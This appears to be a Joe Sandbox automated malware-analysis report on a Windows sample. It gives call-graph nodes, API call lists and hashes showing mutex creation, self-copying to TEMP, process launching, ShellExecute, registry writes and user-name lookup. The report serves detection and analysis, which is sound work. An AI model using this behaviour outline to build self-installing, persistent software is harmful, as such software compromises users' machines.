5d6420 27 API calls 23435->23436 23437 5ed71a 23436->23437 23438 5d6420 27 API calls 23437->23438 23439 5ed735 23438->23439 23440 5d6420 27 API calls 23439->23440 23441 5ed74d 23440->23441 23442 5d1290 std::_Throw_Cpp_error 25 API calls 23441->23442 23443 5ed758 23442->23443 23444 5d1290 std::_Throw_Cpp_error 25 API calls 23443->23444 23445 5ed763 23444->23445 23446 5d1290 std::_Throw_Cpp_error 25 API calls 23445->23446 23447 5ed76e 23446->23447 23448 5d1290 std::_Throw_Cpp_error 25 API calls 23447->23448 23449 5ed779 23448->23449 23450 5d1290 std::_Throw_Cpp_error 25 API calls 23449->23450 23451 5ed784 23450->23451 23452 5d1290 std::_Throw_Cpp_error 25 API calls 23451->23452 23453 5ed78c 23452->23453 23454 5d1290 std::_Throw_Cpp_error 25 API calls 23453->23454 23455 5ed797 23454->23455 23456 5d1290 std::_Throw_Cpp_error 25 API calls 23455->23456 23457 5ed7a2 23456->23457 23458 5d1290 std::_Throw_Cpp_error 25 API calls 23457->23458 23459 5ed7ad 23458->23459 23460 5d1290 std::_Throw_Cpp_error 25 API calls 23459->23460 23461 5ed7b8 23460->23461 23462 5d1290 std::_Throw_Cpp_error 25 API calls 23461->23462 23463 5ed7c3 23462->23463 23464 5d1290 std::_Throw_Cpp_error 25 API calls 23463->23464 23465 5ed7ce 23464->23465 23466 5d1290 std::_Throw_Cpp_error 25 API calls 23465->23466 23467 5ed7d9 23466->23467 23468 5d1290 std::_Throw_Cpp_error 25 API calls 23467->23468 23469 5ed7e4 23468->23469 23470 5d1290 std::_Throw_Cpp_error 25 API calls 23469->23470 23471 5ed7ef 23470->23471 23472 5d1290 std::_Throw_Cpp_error 25 API calls 23471->23472 23473 5ed7fa 23472->23473 23474 5d1290 std::_Throw_Cpp_error 25 API calls 23473->23474 23475 5ed805 23474->23475 23476 5d1290 std::_Throw_Cpp_error 25 API calls 23475->23476 23477 5ed810 23476->23477 23478 5d1290 std::_Throw_Cpp_error 25 API calls 23477->23478 23479 5ed81b 23478->23479 23480 5d1290 std::_Throw_Cpp_error 25 API calls 23479->23480 23481 5ed826 23480->23481 23482 5d1290 std::_Throw_Cpp_error 25 API calls 23481->23482 23483 
5ed831 23482->23483 23484 5d1290 std::_Throw_Cpp_error 25 API calls 23483->23484 23485 5ed83c 23484->23485 23486 5d1290 std::_Throw_Cpp_error 25 API calls 23485->23486 23487 5ed847 23486->23487 23488 5d1290 std::_Throw_Cpp_error 25 API calls 23487->23488 23489 5ed852 23488->23489 23490 5d1290 std::_Throw_Cpp_error 25 API calls 23489->23490 23491 5ed85d 23490->23491 23492 5d1290 std::_Throw_Cpp_error 25 API calls 23491->23492 23493 5ed868 23492->23493 23494 5d1290 std::_Throw_Cpp_error 25 API calls 23493->23494 23495 5ed873 23494->23495 23496 5d1290 std::_Throw_Cpp_error 25 API calls 23495->23496 23497 5ed87e 23496->23497 23498 5d1290 std::_Throw_Cpp_error 25 API calls 23497->23498 23500 5ed889 23498->23500 23501 5edab7 23500->23501 23502 5d1290 std::_Throw_Cpp_error 25 API calls 23500->23502 23730 5d1820 23500->23730 23528 5edaca _Yarn 23501->23528 23747 5d17c0 16 API calls std::_Facet_Register 23501->23747 23502->23500 23504 5d5610 26 API calls std::invalid_argument::invalid_argument 23504->23528 23506 5ef0ad Sleep 23760 5dcb90 25 API calls 2 library calls 23506->23760 23507 5f1930 RaiseException std::_Throw_Cpp_error 23507->23528 23511 5e52e0 27 API calls 23511->23528 23513 5d9f20 39 API calls 23513->23528 23516 5d29c0 113 API calls 23516->23528 23518 5df3a0 33 API calls 23518->23528 23519 5e3530 27 API calls 23519->23528 23520 5d4740 43 API calls std::_Throw_Cpp_error 23520->23528 23521 5dc6e0 16 API calls 23521->23528 23523 5dadc0 27 API calls 23523->23528 23524 5d63a0 27 API calls 23524->23528 23525 5d1290 25 API calls std::_Throw_Cpp_error 23525->23528 23527 5d5880 49 API calls 23527->23528 23528->23504 23528->23506 23528->23507 23528->23511 23528->23513 23528->23516 23528->23518 23528->23519 23528->23520 23528->23521 23528->23523 23528->23524 23528->23525 23528->23527 23748 5d6340 43 API calls std::_Throw_Cpp_error 23528->23748 23749 5e5140 27 API calls 23528->23749 23750 5e4a30 27 API calls 5 library calls 23528->23750 23751 5e5bd0 43 API calls 2 library 
calls 23528->23751 23752 5d56b0 50 API calls 3 library calls 23528->23752 23753 5d4780 59 API calls 3 library calls 23528->23753 23754 5dcb40 25 API calls 2 library calls 23528->23754 23755 5d1330 53 API calls __wsopen_s 23528->23755 23756 5f66fe 23528->23756 23759 5dcb90 25 API calls 2 library calls 23528->23759 23531 5d4763 23530->23531 23531->23531 23532 5d1820 std::_Throw_Cpp_error 43 API calls 23531->23532 23533 5d4775 23532->23533 23533->23222 23535 5d9df8 RegOpenKeyExA 23534->23535 23536 5d9df6 23534->23536 23537 5d9e4b 23535->23537 23538 5d9e13 RegQueryValueExA 23535->23538 23536->23535 23537->23224 23540 5d9e45 RegCloseKey 23538->23540 23541 5d9e66 RegCloseKey 23538->23541 23540->23537 23542 5d9e90 23541->23542 23542->23542 23543 5d1820 std::_Throw_Cpp_error 43 API calls 23542->23543 23544 5d9ea8 23543->23544 23544->23224 23546 5d129b 23545->23546 23547 5d12b6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23545->23547 23546->23547 23762 5f4e4f 25 API calls __Getctype 23546->23762 23547->23228 23553 5d664f 23552->23553 23553->23553 23554 5d1820 std::_Throw_Cpp_error 43 API calls 23553->23554 23555 5d67ae 23554->23555 23763 5d9c00 23555->23763 23557 5d67bf CreateMutexA 23558 5d67ff std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23557->23558 23559 5d6871 GetLastError 23558->23559 23562 5d8b8f 23558->23562 23563 5d6867 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23558->23563 23560 5d8b94 23559->23560 23561 5d6882 GetEnvironmentVariableA 23559->23561 23565 5f66fe 23 API calls 23560->23565 23568 5d68ce 23561->23568 23802 5f4e4f 25 API calls __Getctype 23562->23802 23563->23559 23566 5d8b9b 23565->23566 23803 5f4e4f 25 API calls __Getctype 23566->23803 23568->23568 23570 5d1820 std::_Throw_Cpp_error 43 API calls 23568->23570 23569 5d4740 std::_Throw_Cpp_error 43 API calls 23571 5d8bc5 23569->23571 23572 5d6a36 23570->23572 23795 5d63c0 23571->23795 23576 5d1820 std::_Throw_Cpp_error 43 API calls 23572->23576 23578 5d6a6d 23576->23578 23577 5d8bf2 23580 5d8bfc ShellExecuteA 
23577->23580 23776 5d3190 23578->23776 23583 5d1290 std::_Throw_Cpp_error 25 API calls 23580->23583 23581 5d6a7c 23582 5d6420 27 API calls 23581->23582 23591 5d6aba std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23582->23591 23584 5d8c15 23583->23584 23585 5d1290 std::_Throw_Cpp_error 25 API calls 23584->23585 23586 5d8c20 23585->23586 23588 5d1290 std::_Throw_Cpp_error 25 API calls 23586->23588 23587 5d6b6b CreateDirectoryA GetModuleFileNameA 23590 5d6bbe 23587->23590 23589 5d8c2b 23588->23589 23593 5d1290 std::_Throw_Cpp_error 25 API calls 23589->23593 23596 5d1820 std::_Throw_Cpp_error 43 API calls 23590->23596 23591->23566 23591->23587 23592 5d6b61 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23591->23592 23592->23587 23594 5d8c36 23593->23594 23595 5f66fe 23 API calls 23594->23595 23597 5d8c3d 23595->23597 23600 5d6d3a 23596->23600 23804 5f4e4f 25 API calls __Getctype 23597->23804 23601 5d1820 std::_Throw_Cpp_error 43 API calls 23600->23601 23602 5d6db6 23601->23602 23604 5d9c00 27 API calls 23602->23604 23605 5d6ddb 23604->23605 23607 5d6420 27 API calls 23605->23607 23609 5d6e19 CopyFileA 23607->23609 23615 5d6e3c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23609->23615 23616 5d1820 std::_Throw_Cpp_error 43 API calls 23615->23616 23618 5d70c9 23616->23618 23619 5d1820 std::_Throw_Cpp_error 43 API calls 23618->23619 23620 5d714d 23619->23620 23621 5d9c00 27 API calls 23620->23621 23622 5d7175 23621->23622 23623 5d6420 27 API calls 23622->23623 23625 5d71b9 23623->23625 23625->23625 23627 5d1820 std::_Throw_Cpp_error 43 API calls 23625->23627 23628 5d724d 23627->23628 23629 5d1820 std::_Throw_Cpp_error 43 API calls 23628->23629 23630 5d73eb 23629->23630 23631 5d1820 std::_Throw_Cpp_error 43 API calls 23630->23631 23632 5d75d3 23631->23632 23634 5d6420 27 API calls 23632->23634 23636 5d75ec 23634->23636 23638 5d6420 27 API calls 23636->23638 23639 5d7602 23638->23639 23640 5d6420 27 API calls 23639->23640 23641 5d7618 23640->23641 23642 5d3190 std::_Throw_Cpp_error 27 API calls 
23641->23642 23643 5d7627 __fread_nolock std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23642->23643 23644 5d78cf CreateProcessA 23643->23644 23645 5d7917 WaitForSingleObject CloseHandle CloseHandle 23644->23645 23648 5d7932 23644->23648 23645->23648 23649 5d1820 std::_Throw_Cpp_error 43 API calls 23648->23649 23650 5d7ac9 23649->23650 23650->23650 23651 5d1820 std::_Throw_Cpp_error 43 API calls 23650->23651 23652 5d7ce3 23651->23652 23787 5d9eb0 23652->23787 23654 5d7d08 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23655 5d1820 std::_Throw_Cpp_error 43 API calls 23654->23655 23656 5d7f39 23655->23656 23657 5d1820 std::_Throw_Cpp_error 43 API calls 23656->23657 23658 5d7fb6 23657->23658 23659 5d9c00 27 API calls 23658->23659 23660 5d7fdb 23659->23660 23661 5d6420 27 API calls 23660->23661 23662 5d801f 23661->23662 23663 5d1820 std::_Throw_Cpp_error 43 API calls 23662->23663 23664 5d81bd 23663->23664 23664->23664 23665 5d1820 std::_Throw_Cpp_error 43 API calls 23664->23665 23666 5d83b3 23665->23666 23667 5d9eb0 4 API calls 23666->23667 23668 5d83de std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23667->23668 23669 5d1290 std::_Throw_Cpp_error 25 API calls 23668->23669 23670 5d8496 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23669->23670 23671 5d1820 std::_Throw_Cpp_error 43 API calls 23670->23671 23672 5d8590 23671->23672 23673 5d1820 std::_Throw_Cpp_error 43 API calls 23672->23673 23674 5d8729 23673->23674 23675 5d1820 std::_Throw_Cpp_error 43 API calls 23674->23675 23676 5d87a6 23675->23676 23677 5d63c0 27 API calls 23676->23677 23678 5d87bd 23677->23678 23679 5d6420 27 API calls 23678->23679 23683 5d87d6 23679->23683 23680 5d1290 std::_Throw_Cpp_error 25 API calls 23681 5d8889 23680->23681 23682 5d1290 std::_Throw_Cpp_error 25 API calls 23681->23682 23685 5d8894 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23682->23685 23683->23680 23684 5d8b24 23684->23597 23686 5d8b54 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23684->23686 23685->23684 23688 5d8960 23685->23688 23687 5d1290 std::_Throw_Cpp_error 25 
API calls 23686->23687 23689 5d8b84 23687->23689 23690 5d4740 std::_Throw_Cpp_error 43 API calls 23688->23690 23692 5f0a3c 23689->23692 23691 5d8ac8 23690->23691 23691->23569 23695 5f0a41 23692->23695 23694 5ecc05 23709 5f7f3b 30 API calls 3 library calls 23694->23709 23695->23694 23698 5d1790 Concurrency::cancel_current_task 23695->23698 23812 5f8083 23695->23812 23822 5f9778 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23695->23822 23697 5f0a67 23697->23697 23698->23697 23821 5f1930 RaiseException 23698->23821 23700 5d17ac 23701->23367 23703 5e48d0 23702->23703 23705 5e490c 23702->23705 23704 5d1820 std::_Throw_Cpp_error 43 API calls 23703->23704 23706 5e4905 23704->23706 23707 5d1820 std::_Throw_Cpp_error 43 API calls 23705->23707 23706->23369 23708 5e4a25 23707->23708 23708->23369 23709->23361 23825 5f7ddf 45 API calls 2 library calls 23709->23825 23710->23371 23711->23387 23712->23389 23713->23395 23714->23397 23715->23403 23716->23405 23717->23411 23718->23413 23719->23419 23720->23421 23722 5d6463 23721->23722 23723 5d6528 23722->23723 23724 5d65a0 23722->23724 23728 5d6468 _Yarn 23722->23728 23826 5d17c0 16 API calls std::_Facet_Register 23723->23826 23827 5d17b0 27 API calls std::_Throw_Cpp_error 23724->23827 23728->23425 23729 5d6552 _Yarn 23729->23425 23733 5d1836 _Yarn 23730->23733 23734 5d185e 23730->23734 23731 5d1907 23830 5d17b0 27 API calls std::_Throw_Cpp_error 23731->23830 23733->23500 23734->23731 23828 5d17c0 16 API calls std::_Facet_Register 23734->23828 23737 5d18a7 _Yarn 23740 5d18e9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23737->23740 23829 5f4e4f 25 API calls __Getctype 23737->23829 23740->23500 23747->23528 23748->23528 23749->23528 23750->23528 23751->23528 23752->23528 23753->23528 23754->23528 23755->23528 23831 5f659c 23756->23831 23759->23528 23760->23528 23764 5d9c19 23763->23764 23765 5d9dd0 23763->23765 23767 5d9dd5 23764->23767 23769 5d9cc7 23764->23769 23773 5d9c2e _Yarn 23764->23773 23806 5d62a0 27 API calls 
23765->23806 23807 5d17b0 27 API calls std::_Throw_Cpp_error 23767->23807 23805 5d17c0 16 API calls std::_Facet_Register 23769->23805 23773->23557 23774 5d9d0e _Yarn 23775 5d9d7f _Yarn std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23774->23775 23808 5f4e4f 25 API calls __Getctype 23774->23808 23775->23557 23777 5d31df 23776->23777 23781 5d31b2 _Yarn 23776->23781 23778 5d31ee 23777->23778 23779 5d32db 23777->23779 23809 5d17c0 16 API calls std::_Facet_Register 23778->23809 23810 5d17b0 27 API calls std::_Throw_Cpp_error 23779->23810 23781->23581 23785 5d3235 _Yarn 23786 5d3292 _Yarn std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23785->23786 23811 5f4e4f 25 API calls __Getctype 23785->23811 23786->23581 23788 5d9ebc 23787->23788 23789 5d9ebe RegOpenKeyExA 23787->23789 23788->23789 23790 5d9f0c 23789->23790 23791 5d9ed6 RegSetValueExA 23789->23791 23790->23654 23793 5d9f06 RegCloseKey 23791->23793 23794 5d9f10 RegCloseKey 23791->23794 23793->23790 23794->23654 23796 5d63cf 23795->23796 23797 5d9c00 27 API calls 23796->23797 23798 5d63dd 23797->23798 23799 5d63a0 23798->23799 23800 5d6420 27 API calls 23799->23800 23801 5d63b4 23800->23801 23801->23577 23805->23774 23809->23785 23813 60097d 23812->23813 23814 6009bb 23813->23814 23815 6009a6 HeapAlloc 23813->23815 23819 60098f __Getctype 23813->23819 23824 5f8b26 14 API calls __dosmaperr 23814->23824 23817 6009b9 23815->23817 23815->23819 23818 6009c0 23817->23818 23818->23695 23819->23814 23819->23815 23823 5f9778 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23819->23823 23821->23700 23822->23695 23823->23819 23824->23818 23826->23729 23828->23737 23832 5f65bc 23831->23832 23833 5f65aa 23831->23833 23850 5f6443 23832->23850 23843 5f1554 GetModuleHandleW 23833->23843 23836 5f65af 23836->23832 23844 5f6642 GetModuleHandleExW 23836->23844 23838 5f65f5 23838->23528 23843->23836 23845 5f6684 23844->23845 23846 5f6661 GetProcAddress 23844->23846 23847 5f668a FreeLibrary 23845->23847 23848 5f65bb 23845->23848 23849 
5f6676 23846->23849 23847->23848 23848->23832 23849->23845 23851 5f644f __FrameHandler3::FrameUnwindToState 23850->23851 23866 5f800d EnterCriticalSection 23851->23866 23853 5f6459 23867 5f64af 23853->23867 23855 5f6466 23871 5f6484 23855->23871 23858 5f6600 23876 5fff7d GetPEB 23858->23876 23861 5f662f 23864 5f6642 __InternalCxxFrameHandler 3 API calls 23861->23864 23862 5f660f GetPEB 23862->23861 23863 5f661f GetCurrentProcess TerminateProcess 23862->23863 23863->23861 23865 5f6637 ExitProcess 23864->23865 23866->23853 23869 5f64bb __FrameHandler3::FrameUnwindToState 23867->23869 23868 5f651c __InternalCxxFrameHandler 23868->23855 23869->23868 23874 5fbb99 14 API calls __InternalCxxFrameHandler 23869->23874 23875 5f8055 LeaveCriticalSection 23871->23875 23873 5f6472 23873->23838 23873->23858 23874->23868 23875->23873 23877 5fff97 23876->23877 23879 5f660a 23876->23879 23880 5fd1ee 5 API calls __Getctype 23877->23880 23879->23861 23879->23862 23880->23879 24405 607291 40 API calls std::_Locinfo::_Locinfo_dtor 24308 604496 18 API calls 4 library calls 24309 5f0ca4 45 API calls __RTC_Initialize 24407 5f0ea4 23 API calls __InternalCxxFrameHandler 24359 5f15a3 47 API calls _unexpected
APIs
• CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,Global\,00000007,?,?), ref: 005D67F1
• GetLastError.KERNEL32 ref: 005D6871
• GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 005D6893
• CreateDirectoryA.KERNELBASE(?,00000000,0000000F,?,00000000,0060E898,00000001,?,?,?,?), ref: 005D6B82
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 005D6B96
• CopyFileA.KERNEL32(?,00000000,00000000), ref: 005D6E2E
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,00000000,?), ref: 005D790D
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 005D791C
• CloseHandle.KERNEL32(00000000), ref: 005D792B
• CloseHandle.KERNEL32(?), ref: 005D7930
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 005D8C04
• GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104,00000001,00000006), ref: 005D8C7F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: Create$CloseEnvironmentFileHandleVariable$CopyDirectoryErrorExecuteLastModuleMutexNameObjectProcessShellSingleWait
• String ID: " /F$Global\$TEMP$XFZ@$XFZ@7$XFZ@i6$XFZ@i6$XFZ@i6$XFZ@i6$``$open$wuC$wuC$wuC
• API String ID: 747220738-3486709996
• Opcode ID: 2f955d230f0261ebd0980c472d602a6bf24f329f5d89a28a117140492db83416
• Instruction ID: ead1130a7a568b55406621a02a421554e64aaf2c219b35eee90648c6817f0380
• Opcode Fuzzy Hash: 2f955d230f0261ebd0980c472d602a6bf24f329f5d89a28a117140492db83416
• Instruction Fuzzy Hash: FF630476D206598AEB17CB38C8417E9FBB5BFA6340F14D75BE40472662FB3166C68B00
Strings
Similarity
• API ID: CloseOpenQueryValue
• String ID: !yW$7<=<I$@FSYM_;$XSZ]A_;$ctx`9$dszm9$fyyq9$wytpj:$z}7
• API String ID: 3677997916-2810526515
• Opcode ID: abdd1223bd1cad5f7a37e851491785c0d5f9524159b4326db942c6ac2eae9b2d
• Instruction ID: 971e10f50ff96a3e2085dd97e3801cc20f67083211173c24820fa8255ab49c9a
• Opcode Fuzzy Hash: abdd1223bd1cad5f7a37e851491785c0d5f9524159b4326db942c6ac2eae9b2d
• Instruction Fuzzy Hash: 68B32A35C246994BE717CB79C8166DAF778AF67380F10D3ABE44472662FB3166C28B04

Control-flow Graph
control_flow_graph 1687 5f6600-5f660d call 5fff7d 1690 5f662f-5f663b call 5f6642 ExitProcess 1687->1690 1691 5f660f-5f661d GetPEB 1687->1691 1691->1690 1692 5f661f-5f6629 GetCurrentProcess TerminateProcess 1691->1692 1692->1690
APIs
• GetCurrentProcess.KERNEL32(?,?,005F65FF,00000001,00000000,?,00000001,?,005FCD85), ref: 005F6622
• TerminateProcess.KERNEL32(00000000,?,005F65FF,00000001,00000000,?,00000001,?,005FCD85), ref: 005F6629
• ExitProcess.KERNEL32 ref: 005F663B
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: b7e69ca7cfb17c9e19350e4061fda7c0fa2e6c2db54cc08e2309806ead619385
• Instruction ID: d7c9d13d7a60663547310902716d2635b0db053fa1cc0d5b43cafccc66840e67
• Opcode Fuzzy Hash: b7e69ca7cfb17c9e19350e4061fda7c0fa2e6c2db54cc08e2309806ead619385
• Instruction Fuzzy Hash: 59E0B631080118ABCF116B64DD5D96A7F6AFB45741F105814FA05C6531CB7ADD92CB90

Control-flow Graph
control_flow_graph 1728 5e48b0-5e48ce GetUserNameA 1729 5e490c-5e491b 1728->1729 1730 5e48d0-5e48ed 1728->1730 1732 5e49ec-5e4a09 1729->1732 1733 5e4921-5e492a 1729->1733 1731 5e48f0-5e48f5 1730->1731 1731->1731 1734 5e48f7-5e490b call 5d1820 1731->1734 1737 5e4a10-5e4a15 1732->1737 1735 5e49c0-5e49ea 1733->1735 1736 5e4930-5e49bd 1733->1736 1735->1732 1735->1735 1736->1732 1737->1737 1739 5e4a17-5e4a2b call 5d1820 1737->1739
APIs
• GetUserNameA.ADVAPI32(?,?), ref: 005E48C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: NameUser
• String ID: A
• API String ID: 2645101109-3554254475
• Opcode ID: 5130fba2f4134e3b84b76188a9b85538bbf668b77effae8f1a592c4823896356
• Instruction ID: fd6a25021966aa3f405c9b2e301460f7290bb7c0dde58171d7ebe1831ec096af
• Opcode Fuzzy Hash: 5130fba2f4134e3b84b76188a9b85538bbf668b77effae8f1a592c4823896356
• Instruction Fuzzy Hash: BC4159759146558FEB0ACF78D8113E6BB78EF12384F00CB5DE891B7652E732624A8B40

Control-flow Graph
control_flow_graph 1594 60adaf-60addf call 60aafd 1597 60ade1-60adec call 5f8b13 1594->1597 1598 60adfa-60ae06 call 605ab0 1594->1598 1603 60adee-60adf5 call 5f8b26 1597->1603 1604 60ae08-60ae1d call 5f8b13 call 5f8b26 1598->1604 1605 60ae1f-60ae53 call 60aa68 1598->1605 1614 60b0d4-60b0d8 1603->1614 1604->1603 1611 60ae58-60ae68 1605->1611 1612 60aed5-60aede GetFileType 1611->1612 1613 60ae6a-60ae73 1611->1613 1618 60aee0-60af11 GetLastError call 5f8af0 CloseHandle 1612->1618 1619 60af27-60af2a 1612->1619 1616 60ae75-60ae79 1613->1616 1617 60aeaa-60aed0 GetLastError call 5f8af0 1613->1617 1616->1617 1623 60ae7b-60aea8 call 60aa68 1616->1623 1617->1603 1618->1603 1633 60af17-60af22 call 5f8b26 1618->1633 1621 60af33-60af39 1619->1621 1622 60af2c-60af31 1619->1622 1626 60af3d-60af8b call 6059fb 1621->1626 1627 60af3b 1621->1627 1622->1626 1623->1612 1623->1617 1636 60afaa-60afd2 call 60a815 1626->1636 1637 60af8d-60af99 call 60ac77 1626->1637 1627->1626 1633->1603 1643 60afd4-60afd5 1636->1643 1644 60afd7-60b018 1636->1644 1637->1636 1645 60af9b 1637->1645 1646 60af9d-60afa5 call 5fdb0e 1643->1646 1647 60b039-60b047 1644->1647 1648 60b01a-60b01e 1644->1648 1645->1646 1646->1614 1650 60b0d2 1647->1650 1651 60b04d-60b051 1647->1651 1648->1647 1649 60b020-60b034 1648->1649 1649->1647 1650->1614 1651->1650 1653 60b053-60b086 CloseHandle call 60aa68 1651->1653 1657 60b088-60b0b4 GetLastError call 5f8af0 call 605bc3 1653->1657 1658 60b0ba-60b0ce 1653->1658 1657->1658 1658->1650
APIs
  • Part of subcall function 0060AA68: CreateFileW.KERNELBASE(00000000,00000000,?,0060AE58,?,?,00000000,?,0060AE58,00000000,0000000C), ref: 0060AA85
• GetLastError.KERNEL32 ref: 0060AEC3
• __dosmaperr.LIBCMT ref: 0060AECA
• GetFileType.KERNEL32(00000000), ref: 0060AED6
• GetLastError.KERNEL32 ref: 0060AEE0
• __dosmaperr.LIBCMT ref: 0060AEE9
• CloseHandle.KERNEL32(00000000), ref: 0060AF09
• CloseHandle.KERNEL32(?), ref: 0060B056
• GetLastError.KERNEL32 ref: 0060B088
• __dosmaperr.LIBCMT ref: 0060B08F
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID:
• API String ID: 4237864984-0
• Opcode ID: 699bf22834cf3e1d8bf44015e803800525256651f1d91e15e7b076fa57167246
• Instruction ID: 49d71ce4c6a37202fe6a17ffa17a58db431c1b190f7b7e68341f146a26f114f9
• Opcode Fuzzy Hash: 699bf22834cf3e1d8bf44015e803800525256651f1d91e15e7b076fa57167246
• Instruction Fuzzy Hash: 17A13732A442158FDF2D9FA8DC557EF3BA2AB46360F14015DE812AB3D1DB358912CB52

Control-flow Graph
control_flow_graph 1663 5d9de0-5d9df4 1664 5d9df8-5d9e11 RegOpenKeyExA 1663->1664 1665 5d9df6 1663->1665 1666 5d9e4b-5d9e65 1664->1666 1667 5d9e13-5d9e21 1664->1667 1665->1664 1668 5d9e25-5d9e43 RegQueryValueExA 1667->1668 1669 5d9e23 1667->1669 1670 5d9e45 RegCloseKey 1668->1670 1671 5d9e66-5d9e89 RegCloseKey 1668->1671 1669->1668 1670->1666 1672 5d9e90-5d9e95 1671->1672 1672->1672 1673 5d9e97-5d9eae call 5d1820 1672->1673
APIs
• RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?), ref: 005D9E09
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,000000FF), ref: 005D9E38
• RegCloseKey.ADVAPI32(?), ref: 005D9E45
• RegCloseKey.KERNELBASE(?), ref: 005D9E66
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: Close$OpenQueryValue
• String ID:
• API String ID: 1607946009-0
• Opcode ID: de4bc7d75e187013814a8f86b8bbb098c6ac7b2b1b6f9a9176d7c6ea66ebaf6e
• Instruction ID: 9eecadf8355ff3bd49448fe08dc3d9f0bb7bcc2ec3eaa836f432b1c13885bc1b
• Opcode Fuzzy Hash: de4bc7d75e187013814a8f86b8bbb098c6ac7b2b1b6f9a9176d7c6ea66ebaf6e
• Instruction Fuzzy Hash: 32216F7410021AEFEB34DF18DC48BA67BB9FF05704F00459EE9568B291D7B2A958CBA1

Control-flow Graph
control_flow_graph 1676 5d9eb0-5d9eba 1677 5d9ebc 1676->1677 1678 5d9ebe-5d9ed4 RegOpenKeyExA 1676->1678 1677->1678 1679 5d9f0c-5d9f0f 1678->1679 1680 5d9ed6-5d9ee0 1678->1680 1681 5d9ee4-5d9eeb 1680->1681 1682 5d9ee2 1680->1682 1683 5d9eed 1681->1683 1684 5d9eef-5d9f04 RegSetValueExA 1681->1684 1682->1681 1683->1684 1685 5d9f06 RegCloseKey 1684->1685 1686 5d9f10-5d9f19 RegCloseKey 1684->1686 1685->1679
APIs
• RegOpenKeyExA.KERNELBASE(?,?,00000000,00000002,?), ref: 005D9ECC
• RegSetValueExA.KERNELBASE(?,?,00000000,00000001,00000010,?), ref: 005D9EF9
